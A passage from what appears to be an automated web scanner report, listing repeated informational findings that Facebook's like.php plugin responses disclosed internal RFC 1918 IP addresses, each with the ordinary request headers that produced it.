Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.844. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.136.62

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df9d94d8b8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.845. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.209.42

Request

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FRadiumOne%2F113084648745200%3Fv%3Dpage_getting_started&layout=standard&show_faces=false&width=450&action=like&font=arial&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://radiumone.com/social/developer.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.846. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.4.28

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df340b9c87%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.847. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.186.61

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f7e8e9fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff34167b284%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.848. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.241.38

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3865fdfa%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3575fe8e%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.849. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.144.53

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1587192ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.850. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.132.50

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2fd3dd79c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffd7be705c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.851. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.42.191.51

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df22e9b92d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff324587f18%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.852. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.28.35.110

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1d7876fc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff17e34cb9%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.853. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.132.44

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1fc6c3354%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff11698f0b4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.854. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.186.32

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df282086768%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff36caf868c%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.855. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.32.207.113

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3871537c4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.856. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.154.125

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f0119ec8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3685c0bd%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.857. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.123.35

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2397668d8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffa9a1e43%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.858. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.43.4.21

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3101dd6ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f208f048%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.859. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.136.5.113

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3148362f8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff1eb889e7%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.860. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.232.33

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1f23b6ac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2faddcf58%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.861. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.7.112

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3aa7a87a%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ffb507f9ac%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.862. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.106.30

Request

GET /plugins/like.php?action=recommend&api_key=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24162a30c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff23d30ecb4%26relation%3Dparent.parent%26transport%3Dpostmessage&font=arial&href=http%3A%2F%2Fwww.cnbc.com%2Fid%2F43422860&layout=button_count&locale=en_US&node_type=link&sdk=joey&show_faces=false&width=130 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

19.863. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.146.107

Request

